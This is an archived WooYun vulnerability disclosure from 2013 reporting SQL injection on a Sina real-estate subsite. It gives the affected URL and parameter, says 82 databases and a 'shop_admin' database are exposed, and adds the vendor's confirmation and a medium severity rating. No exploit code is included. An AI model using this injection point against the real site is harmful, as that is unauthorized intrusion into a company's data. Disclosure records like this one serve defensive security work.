WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
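2013-09-26: Details reported to the vendor; awaiting vendor handling
2013-09-26: Vendor confirmed; details disclosed to the vendor only
2013-10-06: Details disclosed to core white hats and experts in related fields
2013-10-16: Details disclosed to regular white hats
2013-10-26: Details disclosed to intern white hats
2013-11-10: Details disclosed to the public
SQL injection vulnerability on a Sina subsite, so many databases.
Address: http://sz.esf.sina.com.cn/ad?p=100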
available databases [82]
Database: shop_admin [170 tables]
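See the detailed description.
The administrator will fix it.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2013-09-26 14:23
Thanks for your attention to Sina security; staff have been assigned to fix it~
None yet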